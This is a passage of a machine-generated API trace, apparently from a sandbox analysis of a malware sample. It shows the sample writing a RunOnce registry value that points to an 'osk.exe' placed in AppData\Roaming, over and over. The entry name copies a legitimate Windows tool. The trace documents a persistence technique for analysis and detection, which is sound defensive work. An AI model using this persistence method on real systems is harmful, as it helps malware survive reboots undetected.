lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.975] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.975] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.976] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.976] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.976] RegCloseKey (hKey=0x280) returned 0x0 [0079.976] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.976] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.976] SetTimer (hWnd=0x20280, nIDEvent=0x205d, uElapse=0xa, lpTimerFunc=0x0) returned 0x205d [0079.976] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.987] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.987] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.987] KillTimer (hWnd=0x20280, uIDEvent=0x205d) returned 1 [0079.987] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.987] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.987] IUnknown:Release (This=0x787518) returned 0x1 [0079.987] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.987] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.987] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.988] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.988] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0079.988] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.988] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5f [0079.988] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.989] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0079.989] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.989] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.989] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.989] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.989] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.989] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.989] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.990] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.990] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.990] RegCloseKey (hKey=0x280) returned 0x0 [0079.990] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.990] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.990] SetTimer (hWnd=0x20280, nIDEvent=0x205e, uElapse=0xa, lpTimerFunc=0x0) returned 0x205e [0079.990] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.004] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.004] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.004] KillTimer (hWnd=0x20280, uIDEvent=0x205e) returned 1 [0080.004] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.004] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.004] IUnknown:Release (This=0x787518) returned 0x1 [0080.005] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.005] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.005] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.005] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.005] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0080.005] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.005] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x60 [0080.005] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.006] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0080.006] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.006] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.006] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.006] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.006] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.006] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.007] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.007] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.007] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.007] RegCloseKey (hKey=0x280) returned 0x0 [0080.007] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.007] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.007] SetTimer (hWnd=0x20280, nIDEvent=0x205f, uElapse=0xa, lpTimerFunc=0x0) returned 0x205f [0080.007] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.020] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.020] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.020] KillTimer (hWnd=0x20280, uIDEvent=0x205f) returned 1 [0080.020] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.020] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.021] IUnknown:Release (This=0x787518) returned 0x1 [0080.021] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.021] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.021] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.021] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.021] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0080.021] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.021] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x61 [0080.021] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.022] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0080.022] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.022] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.022] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.022] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.022] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 